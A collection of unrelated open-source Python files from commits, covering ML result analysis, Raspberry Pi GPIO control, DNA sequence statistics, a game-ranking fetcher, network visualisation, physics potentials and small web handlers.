        a list of relevant result files
    """
    # Hyper-parameter grid the experiments may have been run over.
    all_layers=xrange(1,6);
    all_neurons=xrange(10, 305, 5);
    all_methods=["sgd", "momentum", "adagrad", "rmsprop"];
    all_regularization=["dropout", "l2"];
    result_list=[];
    for n_layers in all_layers:
        for n_neurons in all_neurons:
            for method in all_methods:
                for regular in all_regularization:
                    exp_id=ds.create_exp_id(network_type, n_layers, n_neurons,
                                            batch_size, num_epochs, method, regular);
                    # Only a subset of the grid was actually run; load the
                    # pickled result only when its file exists.
                    if os.path.exists(results_path+exp_id+".pkl"):
                        with open(results_path+exp_id+".pkl", 'r') as f:
                            result_list.append(pickle.load(f));
    return result_list;
def analysis(results_path, network_type, batch_size, num_epochs):
"""
Find the best result from rolling experiment results
Parameters
----------
results_path : string
destination of the results
network_type : string
feedforward or RNN
batch_size : string
batch size for each mini-batch samples
num_epochs : string
total number of training epochs
Returns
-------
best_id : string
Identifier of best result
"""
result_list=search(results_path, network_type, batch_size, num_epochs);
best_result=result_list[0];
worst_result=result_list[0];
for i in xrange(1, len(result_list)):
temp_result=result_list[i];
if np.min(temp_result['cost'][1,:])<np.min(best_result['cost'][1,:]):
best_result=temp_result;
elif np.min(temp_result['cost'][1,:])>np.min(best_result['cost'][1,:]):
worst_result=temp_result;
best_tr_cost=np.min(best_result['cost'][0,:]);
best_tr_epoch=np.argmin(best_result['cost'][0,:]);
best_te_cost=np.min(best_result['cost'][1,:]);
best_te_epoch=np.argmin(best_result['cost'][1,:]);
worst_tr_cost=np.min(worst_result['cost'][0,:]);
worst_tr_epoch=np.argmin(worst_result['cost'][0,:]);
worst_te_cost=np.min(worst_result['cost'][1,:]);
worst_te_epoch=np.argmin(worst_result['cost'][1,:]);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
print "Best result experiment ID: %s" % (best_result['exp_id']);
print "Best result training cost %f in epoch %d" % (best_tr_cost, best_tr_epoch);
print "Best result testing cost %f in epoch %d" % (best_te_cost, best_te_epoch);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
print "Worst result experiment ID: %s" % (worst_result['exp_id']);
print "Worst result training cost %f in epoch %d" % (worst_tr_cost, worst_tr_epoch);
print "Worst result testing cost %f in epoch %d" % (worst_te_cost, worst_te_epoch);
print "-----------------------------------------------------------------------";
print "-----------------------------------------------------------------------";
return ;
# CLI: forwards the four options straight into analysis() as keyword args.
parser=argparse.ArgumentParser(description="Find Best Result From Rolling Experiments");
parser.add_argument("--results-path", type=str, default="../results/",
                    help="Destination of result files.");
parser.add_argument("--network-type", type=str, default="feedforward",
                    help="Type of network: feedforward or RNN.");
parser.add_argument("--batch-size", type=str, default="200",
                    help="Batch size of each mini-batch samples.");
parser.add_argument("--num-epochs", type=str, default="1000",
                    help="Total training epochs for training.");
args=parser.parse_args();
analysis(**vars(args));
747fa222d1e382ced363ced9d2565f384769316c | add button listener | Shura1oplot/raspberry-pi-collection,Shura1oplot/raspberry-pi-collection | button-listen.py | button-listen.py | #!/usr/bin/env python
import sys
from time import time, sleep
import RPi.GPIO as GPIO
def main(argv=sys.argv):
    """Watch one GPIO pin (BCM number in argv[1]) and print '<pin>:<level>'
    on every debounced edge.  Runs until interrupted; always cleans up GPIO.
    """
    channel = int(argv[1])
    GPIO.setmode(GPIO.BCM)
    try:
        GPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
        ts = 0
        while True:
            GPIO.wait_for_edge(channel, GPIO.BOTH)
            # Software debounce: ignore edges within 0.2 s of the last one.
            if time() - ts <= 0.2:
                continue
            # Let the level settle briefly before sampling it.
            sleep(0.01)
            print "{}:{}".format(channel, GPIO.input(channel))
            sys.stdout.flush()
            ts = time()
    finally:
        GPIO.cleanup()
if __name__ == "__main__":
    sys.exit(main())
| mit | Python | |
4576d623fa48242ede9a106b642cc4b020ec3595 | Create processDNAta.py | AEFisher/NGS-scripts | processDNAta.py | processDNAta.py | """
processDNAta.py
version 9/5/2014
Author: Ellen Blaine
This program takes in a folder containing files of exon sequences and returns
data about those files in the form of a CSV file, including which species
for whom a sequence was recovered, the percentage AT/CG bias, and the median
recovered sequence length. This program is meant to be used in conjunction
with TEF and AlignHelper.
Important Note: The input files' sequences should contain question marks to
indicate a sequence was NOT recovered. Questionable nucleotides should be identified
as N's or another character, but NOT question marks. If '?' is found at the
beginning of a sequence, the program will assume that sequence was NOT recovered.
Sample input: python processDNAta_v1.py AlignHelper_Output SpeciesNames.txt
"""
from sys import argv
import os
# Python 2 script.  Usage: python processDNAta.py <folder-of-fastas> <species-names.txt>
script, folder, species = argv
path = folder + '/'
listing = os.listdir(path)
# Output CSV; one row per exon file is appended by the loop at the bottom.
newfile = open("processDNAta_Output.csv", 'w')
def createdict(infile):
    """Parse the FASTA file at the module-level *path* into {header: sequence}.

    Headers keep their trailing newline (findmedian relies on that exact key
    format) and sequences keep embedded newlines, matching the original
    parser.  A leading {"": ""} placeholder entry (produced before the first
    '>' header) is preserved for compatibility.

    NOTE(review): the *infile* argument is unused — the caller sets the
    global ``path`` before each call; confirm before changing the signature.
    """
    records = {}
    name = ""
    seq = ""
    # BUG FIX: the original re-iterated the exhausted file handle in a dead
    # second loop and never closed the file; a single pass with `with` keeps
    # the behavior while fixing both, and avoids shadowing builtins
    # `file`/`dict`.
    with open(path, 'r') as handle:
        for line in handle:
            if line.startswith('>'):
                # Flush the previous record before starting a new one.
                records[name] = seq
                name = line
                seq = ""
            else:
                seq += line
    records[name] = seq
    return records
def searchdict(item, dict):
    """Return True when some *recovered* record's header contains *item*.

    Records whose sequence starts with '?' were not recovered and are
    ignored.
    """
    target = item.rstrip()
    return any(target in header and not seq.startswith('?')
               for header, seq in dict.items())
def findbias(dict):
    """Return (percent AT, percent CG) over all recovered sequences.

    Sequences starting with '?' (not recovered) are skipped; only the
    uppercase bases A/T/C/G are counted, so N's, gaps and newlines are
    excluded from the total.
    """
    at_count = 0
    cg_count = 0
    for seq in dict.values():
        if seq.startswith('?'):
            continue
        for base in seq:
            if base == 'A' or base == 'T':
                at_count += 1
            elif base == 'C' or base == 'G':
                cg_count += 1
    total = at_count + cg_count
    return float(at_count) / total * 100, float(cg_count) / total * 100
# Write the CSV header row: one column per species name, followed by the
# AT/CG bias columns and the median-length summary column.
species_list = []
species_file = open(species, 'r')
newfile.write(" ,")
for line in species_file:
    species_list.append(line.rstrip())
    newfile.write(line.rstrip() + ", ")
newfile.write("% AT bias, % CG bias, ")
newfile.write("Median Sequence Length (bp)")
newfile.write('\n')
def findmedian(dict):
    """Return the median length (bp) of the recovered sequences in *dict*.
    NOTE(review): this mutates its argument — it pops the record keyed by
    the module-level *infile* (header newline included), presumably to keep
    the reference species' own sequence out of the median; confirm intent.
    Raises IndexError when no sequence was recovered.
    """
    dict.pop(">" + infile[:infile.find('.')] + "\n")
    lengths = []
    for value in dict.values():
        if not value.startswith('?'):
            lengths.append(len(value))
    lengths.sort()
    # Python 2 integer division; under Python 3 this would produce a float
    # and the list indexing below would fail.
    middle_index = len(lengths)/2
    if len(lengths) % 2 == 1:
        return lengths[middle_index]
    else:
        median = (lengths[middle_index] + lengths[middle_index - 1]) / 2
        return median
# One CSV row per FASTA file: per-species presence flags, AT/CG bias, then
# the median recovered sequence length.
for infile in listing:
    if ".fasta" in infile:
        # The helper functions read this module-level `path`.
        path = folder + '/' + infile
        dict = createdict(infile)
        # NOTE(review): this handle is never used or closed.
        file = open(path, 'r')
        newfile.write(infile[:infile.find('.')] + ", ")
        for item in species_list:
            if searchdict(item, dict):
                newfile.write("1, ")
            else:
                newfile.write("0, ")
        percentAT, percentCG = findbias(dict)
        median = findmedian(dict)
        newfile.write(str(percentAT) + "%, " + str(percentCG) + "%, ")
        newfile.write(str(median) + "\n")
| mit | Python | |
090cdf443aba871c9230a274fbe2242a7e873822 | Create gpiorpiplugin.py | damianolombardo/fauxmo | gpiorpiplugin.py | gpiorpiplugin.py | """
GPIORPiPlugin.py :: Fauxmo plugin for simple RPi.GPIO.
"""
try:
import RPi.GPIO as GPIO
except ImportError:
import testRPiGPIO as GPIO
print('Using testRPiGPIO')
from functools import partialmethod # type: ignore # not yet in typeshed
from fauxmo.plugins import FauxmoPlugin
from time import sleep
import sys
DEBUG = True
def dbg(msg):
    """Print *msg* and flush stdout immediately when module-level DEBUG is on."""
    if not DEBUG:
        return
    print(msg)
    sys.stdout.flush()
def gpio_handler(pins, state=None):
    """Drive one pin or a list of pins to *state* via RPi.GPIO."""
    # Normalize a single pin number to a one-element list.
    if type(pins) is not list:
        pins = [pins]
    if state == 'input':
        for p in pins:
            # NOTE(review): RPi.GPIO's GPIO.input(channel) takes a single
            # argument, so this call would raise TypeError if this branch
            # were ever hit; no caller in this file passes state='input'.
            # Confirm against the RPi.GPIO API before relying on it.
            GPIO.input(p, state)
    else:
        for p in pins:
            GPIO.output(p, state)
class GPIORPiPlugin(FauxmoPlugin):
    """Fauxmo Plugin for running commands on the local machine."""
    def __init__(self, *, name: str, port: int, on_cmd: int, off_cmd: int, pin: int or list, mode: str,
                 switching_type: str) -> None:
        """Initialize a GPIORPiPlugin instance.
        Args:
            name: Name for this Fauxmo device
            port: Port on which to run a specific GPIORPiPlugin instance
            on_cmd: Command to be called when turning device on
            off_cmd: Command to be called when turning device off
            pin: GPIO pin number
            mode: GPIO mode eg BCM, BOARD
            switching_type: What kind of output to send, oneshot, toggle
        """
        self.on_cmd = on_cmd
        self.off_cmd = off_cmd
        self.pin = pin
        self.mode = mode
        self.switching_type = switching_type
        # BCM/BOARD: claim the pin as an output and remember its level.
        if mode == 'BCM':
            GPIO.setmode(GPIO.BCM)
            GPIO.setup(self.pin, GPIO.OUT)
            self.internal_state = GPIO.input(self.pin)
        elif mode == 'BOARD':
            GPIO.setmode(GPIO.BOARD)
            GPIO.setup(self.pin, GPIO.OUT)
            self.internal_state = GPIO.input(self.pin)
        # LEECH: piggyback on pins some other switch already configured.
        # NOTE(review): in this branch internal_state is never initialized
        # (it is first assigned by oneshot/toggle) — confirm nothing reads
        # it before the first command.
        elif mode == 'LEECH':
            if type(self.pin) is list:
                for p in self.pin:
                    if GPIO.gpio_function(p) != GPIO.OUT:
                        raise Exception('Pin %i has not been defined as standalone switch' % p)
            elif type(self.pin) is int:
                dbg('Leech Mode Set for pin %i' % self.pin)
        # Select the output strategy used by run_cmd for both on and off.
        if self.switching_type == 'oneshot':
            self.func = self.oneshot
        else:
            self.func = self.toggle
        super().__init__(name=name, port=port)
    def oneshot(self, cmd: str) -> bool:
        """Partialmethod to run command.
        Args:
            cmd: Will be one of `"on_cmd"` or `"off_cmd"`, which `getattr` will
                use to get the instance attribute.
        """
        state = getattr(self, cmd)
        # Pulse: drive the commanded level, hold 2 s, then drive the
        # opposite level (momentary-switch behavior).
        gpio_handler(self.pin, state)
        sleep(2)
        gpio_handler(self.pin, 1 - state)
        # NOTE(review): internal_state records the commanded level even
        # though the pin ends at 1 - state — presumably the logical device
        # state, not the pin level; confirm.
        self.internal_state = state
        return True
    def toggle(self, cmd: str) -> bool:
        """Partialmethod to run command.
        Args:
            cmd: Will be one of `"on_cmd"` or `"off_cmd"`, which `getattr` will
                use to get the instance attribute.
        """
        state = getattr(self, cmd)
        gpio_handler(self.pin, state)
        # Read the level back so internal_state reflects the hardware.
        # NOTE(review): with a list-valued pin this GPIO.input call would
        # fail — confirm toggle is only used with a single pin.
        self.internal_state = GPIO.input(self.pin)
        return True
    def run_cmd(self, cmd: str):
        # Dispatch through the strategy chosen in __init__.
        return self.func(cmd)
    # Entry points Fauxmo calls for "turn on"/"turn off".
    on = partialmethod(run_cmd, "on_cmd")
    off = partialmethod(run_cmd, "off_cmd")
if __name__ == "__main__":
    # Manual smoke test: three standalone BCM switches plus one LEECH
    # switch that drives all three pins at once.
    print('Create switch')
    test1 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=14, mode='BCM',
                          switching_type='toggle')
    test2 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=15, mode='BCM',
                          switching_type='toggle')
    test3 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=18, mode='BCM',
                          switching_type='toggle')
    test4 = GPIORPiPlugin(name="test switch", port=12345, on_cmd=1, off_cmd=0, pin=[14, 15, 18], mode='LEECH',
                          switching_type='toggle')
    print('test on')
    test1.on()
    print('test off')
    test1.off()
    test4.on()
| mit | Python | |
8dc7f657e816ab9becbabcf032e62d088f2b6b3c | Add network visualization tool | step-up-health/step-up-backend,step-up-health/step-up-backend | viz.py | viz.py | import os
import json
import hashlib
def get_data_path():
    """Return the path of the JSON data file.

    Uses ``$OPENSHIFT_DATA_DIR`` when deployed on OpenShift, otherwise a
    path relative to the working directory.
    """
    data_dir = os.environ.get('OPENSHIFT_DATA_DIR')
    if data_dir is None:
        return '../data/data.json'
    return os.path.join(data_dir, 'data.json')
def get_data():
    """Load and return the stored data, creating an empty store on first use.

    Returns the parsed JSON content of the data file (a dict).
    """
    path = get_data_path()
    # Bootstrap an empty JSON object so json.load below always succeeds.
    if not os.path.isfile(path):
        with open(path, 'w') as fh:
            fh.write("{}")
    # Use a context manager so the read handle is closed deterministically
    # (the original left the handle for the GC to reclaim).
    with open(path, 'r') as fh:
        return json.load(fh)
def weird_hash(data):
    """Return an anonymized MD5 hex digest of *data*, digits mapped to letters.

    Each digit 0-9 in the hex digest is shifted into the uppercase range
    ('0' -> 'A', ..., '9' -> 'J'), so the result contains only letters and
    is safe to use as a Graphviz node identifier.
    """
    if isinstance(data, str):
        # hashlib requires a bytes-like object; accept str transparently.
        data = data.encode('utf-8')
    hashed = hashlib.md5()
    hashed.update(data)
    digest = hashed.hexdigest()
    uppercase_offset = ord('A') - ord('0')
    # range() excludes the upper bound, so add 1 to include '9'
    # (the original stopped at '8' and left '9' unmapped).
    for x in range(ord('0'), ord('9') + 1):
        digest = digest.replace(chr(x), chr(x + uppercase_offset))
    return digest
# Build a Graphviz "dot" description of the anonymized friendship graph.
out = 'graph main {\n'
dot_usernames = ''
dot_relations = ''
data = get_data()
for k in data:
    user = data[k]
    # NOTE(review): username is read but never used below.
    username = user['username']
    # Node id is the hashed user key; the label shows only its first 5 chars.
    dot_usernames += weird_hash(k) + '[label="' + weird_hash(k)[:5] + '"]' + '\n'
    if not 'friends' in user:
        continue
    for friend in user['friends']:
        # Skip an edge only if the reversed form was already emitted, so a
        # mutual friendship produces a single undirected edge.
        if not (weird_hash(friend) + '--' +
                weird_hash(k) + '\n') in dot_relations:
            dot_relations += weird_hash(k) + '--' + \
                weird_hash(friend) + '\n'
out += dot_usernames
out += dot_relations
out += '}'
print(out)
| cc0-1.0 | Python | |
0f3815ed22c4e25d311f36e0d9be9c5b38bd32bd | Create the basic structure for the topic handler. | yiyangyi/cc98-tornado | handler/topic.py | handler/topic.py | class IndexHandler(BaseHandler):
class ViewHandler(BaseHandler):
    """Skeleton handler (name suggests: view a topic) -- not implemented yet."""
    # A body is required; without `pass` the module is a syntax error.
    pass
class CreateHandler(BaseHandler):
    """Skeleton handler (name suggests: create a topic) -- not implemented yet."""
    pass
class EditHandler(BaseHandler):
    """Skeleton handler (name suggests: edit a topic) -- not implemented yet."""
    pass
class FavoriteHandler(BaseHandler):
    """Skeleton handler (name suggests: favorite a topic) -- not implemented yet."""
    pass
class CancelFavoriteHandler(BaseHandler):
    """Skeleton handler (name suggests: unfavorite a topic) -- not implemented yet."""
    pass
class VoteHandler(BaseHandler):
    """Skeleton handler (name suggests: vote on a topic) -- not implemented yet."""
    pass
class ReplyEditHandler(BaseHandler): | mit | Python | |
c725fb59055810903fd4a9b1da1b6ef11cab2d74 | Add functions for timeseries reduction in mpopf | openego/eDisGo,openego/eDisGo | edisgo/opf/timeseries_reduction.py | edisgo/opf/timeseries_reduction.py | import logging
import pandas as pd
from edisgo.flex_opt import check_tech_constraints
logger = logging.getLogger(__name__)
def _scored_critical_current(edisgo_obj, grid):
    """Score each time step by the summed relative line-current violations.

    Returns a pandas Series indexed by time step, sorted descending, where
    the value is the sum over all MV lines of current relative to the
    allowed loading (only entries > 1, i.e. violations, contribute).
    """
    # Get allowed current per line per time step
    i_lines_allowed = check_tech_constraints.lines_allowed_load(
        edisgo_obj, grid, 'mv')
    i_lines_pfa = edisgo_obj.results.i_res[grid.lines_df.index]
    # Get current relative to allowed current
    relative_i_res = i_lines_pfa / i_lines_allowed
    # Get lines that have violations (relative loading above 1)
    crit_lines_score = relative_i_res[relative_i_res > 1]
    # Remove time steps with no violations
    crit_lines_score = crit_lines_score.dropna(how='all', axis=0)
    # Cumulate violations over all lines per time step
    crit_lines_score = crit_lines_score.sum(axis=1)
    return crit_lines_score.sort_values(ascending=False)
def _scored_critical_voltage(edisgo_obj, grid):
    """Score each time step by the summed over- and under-voltage deviations.

    Returns a pandas Series indexed by time step, sorted descending, with
    the sum over all MV buses of voltage deviations beyond the allowed band.
    """
    nodes = grid.buses_df
    # Get allowed deviations per time step
    v_dev_allowed_upper, v_dev_allowed_lower = check_tech_constraints.mv_allowed_deviations(
        edisgo_obj, voltage_levels='mv')
    voltage_diff_uv, voltage_diff_ov = check_tech_constraints.voltage_diff(
        edisgo_obj, nodes, v_dev_allowed_upper, v_dev_allowed_lower, voltage_level='mv')
    # Keep only positive deviations (actual violations) and sum them per
    # time step, separately for under- and over-voltage.
    voltage_diff_uv = voltage_diff_uv[voltage_diff_uv > 0].dropna(
        axis=1, how='all').sum(axis=0)
    voltage_diff_ov = voltage_diff_ov[voltage_diff_ov > 0].dropna(
        axis=1, how='all').sum(axis=0)
    return (voltage_diff_ov + voltage_diff_uv).sort_values(ascending=False)
def get_steps_curtailment(edisgo_obj, percentage=0.5):
    '''
    Return the most critical time steps for modeling curtailment.

    :param edisgo_obj: The eDisGo API object
    :type edisgo_obj: :class:`~.network.network.EDisGo`
    :param percentage: The fraction (0..1) of most critical time steps to select
    :type percentage: float
    :returns: list of `pandas.Timestamp<timestamp>` -- the reduced time steps for modeling curtailment
    '''
    # Run power flow if results are not available yet
    if edisgo_obj.results is None:
        logger.debug('Running initial power flow')
        edisgo_obj.analyze(mode='mv')
    grid = edisgo_obj.topology.mv_grid
    # Select most critical steps based on current violations.
    # Fix: the original called the non-existent names scored_critical_current
    # and scored_critical_voltage (NameError); the helpers defined above are
    # underscore-prefixed.
    current_scores = _scored_critical_current(edisgo_obj, grid)
    num_steps_current = int(len(current_scores) * percentage)
    steps = current_scores[:num_steps_current].index.tolist()
    # Select most critical steps based on voltage violations
    voltage_scores = _scored_critical_voltage(edisgo_obj, grid)
    num_steps_voltage = int(len(voltage_scores) * percentage)
    steps.extend(voltage_scores[:num_steps_voltage].index.tolist())
    return steps
def get_steps_storage(edisgo_obj, window=5):
    '''
    Return the reduced set of time steps for modeling storage: every time
    step with a voltage or current violation, padded by *window* hours on
    each side.

    :param edisgo_obj: The eDisGo API object
    :type edisgo_obj: :class:`~.network.network.EDisGo`
    :param window: The additional hours to include before and after each critical time step
    :type window: int
    :returns: list of `pandas.Timestamp<timestamp>` -- the reduced time steps for modeling storage
    '''
    # Run power flow if results are not available yet
    if edisgo_obj.results is None:
        logger.debug('Running initial power flow')
        edisgo_obj.analyze(mode='mv')
    crit_periods = []
    # Get periods with voltage violations
    crit_nodes = check_tech_constraints.mv_voltage_deviation(
        edisgo_obj, voltage_levels='mv')
    for v in crit_nodes.values():
        nodes = pd.DataFrame(v)
        if 'time_index' in nodes:
            for step in nodes['time_index']:
                if not step in crit_periods:
                    crit_periods.append(step)
    # Get periods with current violations
    crit_lines = check_tech_constraints.mv_line_load(edisgo_obj)
    if 'time_index' in crit_lines:
        for step in crit_lines['time_index']:
            if not step in crit_periods:
                crit_periods.append(step)
    reduced = []
    window_period = pd.Timedelta(window, unit='h')
    # Expand every critical step into an hourly window around it.
    for step in crit_periods:
        reduced.extend(
            pd.date_range(
                start=step -
                window_period,
                end=step +
                window_period,
                freq='h'))
    # strip duplicates while preserving order
    reduced = list(dict.fromkeys(reduced))
    logger.debug(reduced)
    return reduced
| agpl-3.0 | Python | |
b48a17f45bbb9a2202c8c3fcb377037b92961f0b | Create na.py | pax2001/test | na.py | na.py | hjghjgj
| apache-2.0 | Python | |
48a9b87dd86d600cdab4224c84aa5ce0685b775c | Add fetch data file | joostsijm/Supremacy1914,joostsijm/Supremacy1914 | python/fetch.py | python/fetch.py | #!/usr/bin/env python
import time
import json
import requests
# Static HTTP headers mimicking a browser session against the game server.
headers = {
    "Host": "xgs15.c.bytro.com",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0",
    "Accept": "text/plain, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Content-Length": "387",
    "Origin": "https://www.supremacy1914.com",
    "DNT": "1",
    "Connection": "keep-alive",
}
# Template request body shared by all API calls; callers should copy it
# before adding per-request fields.
# SECURITY NOTE(review): userAuth is a hard-coded credential committed to
# the repository -- it should be loaded from the environment instead.
# Also note "tstamp" is evaluated once at import time, not per request.
payloadSample = {
    "@c": "ultshared.action.UltUpdateGameStateAction",
    "gameID": "2117045",
    "playerID": 0,
    "userAuth": "787925a25d0c072c3eaff5c1eff52829475fd506",
    "tstamp": int(time.time())
}
url = 'https://xgs15.c.bytro.com/'
def print_json(jsonText):
    """Pretty-print *jsonText* as sorted, 4-space-indented JSON."""
    formatted = json.dumps(jsonText, sort_keys=True, indent=4)
    print(formatted)
def get_day():
    """Return the current day number of the game.

    Sends a game-state query (stateType 12, option 30) and reads
    ``result.dayOfGame`` from the JSON response.
    """
    # Copy the template so per-request fields do not leak into the shared
    # module-level payloadSample (the original mutated it in place, letting
    # stale fields bleed between the different API functions).
    payload = dict(payloadSample)
    payload["stateType"] = 12
    payload["option"] = 30
    r = requests.post(url, headers=headers, json=payload)
    response = json.loads(r.text)
    result = response["result"]
    return result["dayOfGame"]
def get_score(day):
    """Return the ranking entries for the given game *day*.

    Sends a ranking query (stateType 2) and extracts the nested
    ``result.ranking.ranking`` list from the JSON response.
    """
    # Copy the template instead of mutating the shared payloadSample.
    payload = dict(payloadSample)
    payload["stateType"] = 2
    payload["option"] = day
    r = requests.post(url, headers=headers, json=payload)
    text = json.loads(r.text)
    return text["result"]["ranking"]["ranking"]
def write_results():
    """Write one CSV row of ranking scores per game day to results.csv."""
    # Context manager guarantees the file is closed even if a request fails
    # (the original only closed it on the happy path).
    with open("results.csv", "w") as resultsFile:
        # Days are 1-based: the original looped range(0, n) and bumped the
        # counter inside the body; range(1, n + 1) says the same directly.
        for day in range(1, get_day() + 1):
            print("day: " + str(day))
            result = get_score(day)
            # Drop the first entry; presumably a header/placeholder row --
            # TODO confirm against the API response shape.
            result.pop(0)
            formatedResult = "".join(str(player) + "," for player in result)
            resultsFile.write(formatedResult + "\n")
def get_players():
    """Fetch the game's player list (stateType 1) and pretty-print it."""
    # Copy the template instead of mutating the shared payloadSample; the
    # original left the "option" field from a previous call in the request.
    payload = dict(payloadSample)
    payload["stateType"] = 1
    r = requests.post(url, headers=headers, json=payload)
    text = json.loads(r.text)
    print_json(text["result"]["players"])
# Script entry: dump the player list; uncomment write_results() to export
# the per-day scores to results.csv instead.
get_players()
#write_results()
print("\ndone!")
| apache-2.0 | Python | |
3c7e8f08699fa6d2b004f86e6bdb0bc4792ae8c2 | Create regex.py | rogergrindelwald/code_snippets | python/regex.py | python/regex.py | # re.IGNORECASE can be used for allowing user to type arbitrary cased texts.
# Case-insensitive "quit" matcher so users can type e.g. "Quit" or "QUIT".
# NOTE(review): this snippet relies on `import re`, which is not present in
# the file -- it would raise NameError if executed as-is.
QUIT_NO_CASE = re.compile('quit', re.IGNORECASE)
| mit | Python | |
b01c602f156b5a72db1ea4f27989aa5b1afdada8 | ADD Cleaning before each test | telefonicaid/fiware-keypass,telefonicaid/fiware-keypass,telefonicaid/fiware-keypass | src/behavior/features/terrain.py | src/behavior/features/terrain.py | from lettuce import *
import requests
TARGET_URL='http://localhost:8080'
tenantList = [ "511", "615", "634", "515" ]
@before.each_scenario
def cleanContext(feature):
    """Delete all policies for every known tenant before each scenario.

    `before` comes from the star-import of lettuce at the top of the file.
    """
    for tenant in tenantList:
        url = TARGET_URL + '/pap/v1/' + tenant
        # NOTE(review): the response is captured but its status is never
        # checked -- a failed cleanup would go unnoticed.
        r = requests.delete(url)
| apache-2.0 | Python | |
5f4263b6968c839bd67a60f4a2ffd89f8b373193 | Update __init__.py | Tendrl/node-agent,Tendrl/node_agent,r0h4n/node-agent,Tendrl/node_agent,Tendrl/node-agent,r0h4n/node-agent,r0h4n/node-agent,Tendrl/node-agent | tendrl/provisioning/objects/definition/__init__.py | tendrl/provisioning/objects/definition/__init__.py | import pkg_resources
from ruamel import yaml
from tendrl.commons import objects
class Definition(objects.BaseObject):
    """Tendrl object exposing the bundled provisioning definition file.

    Loads ``provisioning.yaml`` shipped next to this module and keeps its
    parsed content; stored under ``_NS/provisioning/definitions``.
    """
    # Marks this object as internal (per the tendrl objects convention).
    internal = True
    def __init__(self, *args, **kwargs):
        self._defs = True
        super(Definition, self).__init__(*args, **kwargs)
        # Raw YAML bytes read from inside the installed package.
        self.data = pkg_resources.resource_string(__name__,
                                                  "provisioning.yaml")
        self._parsed_defs = yaml.safe_load(self.data)
        self.value = '_NS/provisioning/definitions'
    def get_parsed_defs(self):
        """Return the parsed definitions, re-parsing only if the cache is falsy."""
        if self._parsed_defs:
            return self._parsed_defs
        self._parsed_defs = yaml.safe_load(self.data)
        return self._parsed_defs
| import pkg_resources
from ruamel import yaml
from tendrl.commons import objects
class Definition(objects.BaseObject):
internal = True
def __init__(self, *args, **kwargs):
self._defs = True
super(Definition, self).__init__(*args, **kwargs)
self.data = pkg_resources.resource_string(__name__,
"provisioning.yaml")
self._parsed_defs = yaml.safe_load(self.data)
self.value = '_NS/provisioning/definitions'
def get_parsed_defs(self):
self._parsed_defs = yaml.safe_load(self.data)
return self._parsed_defs
| lgpl-2.1 | Python |
f784228170557643bc5cb1efc61ea38b45796210 | Add flask application | ledmonster/nishiki | app.py | app.py | # -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
@app.route('/')
def main():
    """Root endpoint: returns a plain-text greeting."""
    return 'hello'
if __name__ == "__main__":
app.run()
| mit | Python | |
ef67bf3d8a418399fca676502a87ccb7d3914ed1 | Add module with common potentials, with force versions for some | eddiejessup/ciabatta | Lib/potentials.py | Lib/potentials.py | import numpy as np
import utils
def LJ(r_0, U_0):
    '''
    Lennard-Jones with minimum at (r_0, -U_0).
    '''
    # Precompute r_0 ** 6 once; the repulsive term is the square of the
    # attractive (r_0 / r) ** 6 term.
    r0_pow6 = r_0 ** 6

    def func(r_sq):
        term6 = r0_pow6 / r_sq ** 3
        return U_0 * (term6 ** 2 - 2.0 * term6)
    return func
def step(r_0, U_0):
    '''
    Potential Well at r with U(r < r_0) = 0, U(r > r_0) = U_0.
    '''
    def func(r_sq):
        # NOTE(review): this returns U_0 *inside* the well (r_sq < r_0**2)
        # and 0 outside, which contradicts the docstring above (and the
        # logistic() approximation below, which rises towards U_0 for
        # r > r_0).  Confirm which orientation is intended.
        return np.where(r_sq < r_0 ** 2, U_0, 0.0)
    return func
def inv_sq(k):
    '''
    Inverse-square law, U(r) = -k / r.
    '''
    def func(r_sq):
        # Recover r from the squared separation, then apply U = -k / r.
        r = np.sqrt(r_sq)
        return -k / r
    return func
def harm_osc(k):
    '''
    Harmonic oscillator, U(r) = k * (r ** 2) / 2.0.
    '''
    def func(r_sq):
        # r_sq is already the squared separation (the convention used by
        # every other potential in this module), so U = 0.5 * k * r_sq.
        # The original returned 0.5 * k * r_sq ** 2, i.e. k * r**4 / 2,
        # contradicting its own docstring.
        return 0.5 * k * r_sq
    return func
def harm_osc_F(k):
    '''
    Harmonic oscillator, F(r) = -k * r.
    '''
    def force(r):
        # Linear restoring force, proportional to the displacement.
        return -k * r
    return force
def logistic(r_0, U_0, k):
    ''' Logistic approximation to step function. '''
    def func(r_sq):
        r = np.sqrt(r_sq)
        # tanh rises from -1 to 1 around r_0 with steepness k, so the
        # bracket sweeps 0 -> 2 and the prefactor rescales it to 0 -> U_0.
        envelope = 1.0 + np.tanh(k * (r - r_0))
        return 0.5 * U_0 * envelope
    return func
def logistic_F(r_0, U_0, k):
    """Force corresponding to the logistic potential, for arrays of vectors.

    Relies on the project-local ``utils`` module for vector magnitude and
    unit-vector helpers.
    """
    def func(r):
        # NOTE(review): the variable is named r_sq but utils.vector_mag
        # presumably returns the magnitude (not its square), in which case
        # np.sqrt below takes the square root of the magnitude -- confirm
        # against utils' definition.
        r_sq = utils.vector_mag(r)
        return -U_0 * utils.vector_unit_nonull(r) * (1.0 - np.square(np.tanh(k * (np.sqrt(r_sq) - r_0))))[:, np.newaxis]
    return func
def anis_wrap(func_iso):
    '''
    Wrap an isotropic potential in an anisotropic envelope
    '''
    def func_anis(r_sq, theta):
        # Angular modulation varies between 0.5 and 1.5 over theta.
        envelope = 0.5 + np.cos(0.5 * theta) ** 2
        return func_iso(r_sq) * envelope
    return func_anis
| bsd-3-clause | Python | |
1ece8c8640214d69a224f94f1b1ac93ec53d7699 | Add image processing system (dummy) | susemeee/Chunsabot-framework | chunsabot/modules/images.py | chunsabot/modules/images.py | from chunsabot.botlogic import brain
@brain.route("@image")
def add_image_description(msg, extras):
    """Handle the "@image" route: describe an attached image.

    Returns None when no attachment is present.  The "asdf" return value is
    a placeholder -- real image processing is not implemented yet (the
    commit calls this a dummy).
    """
    attachment = extras['attachment']
    if not attachment:
        return None
    return "asdf"
| mit | Python | |
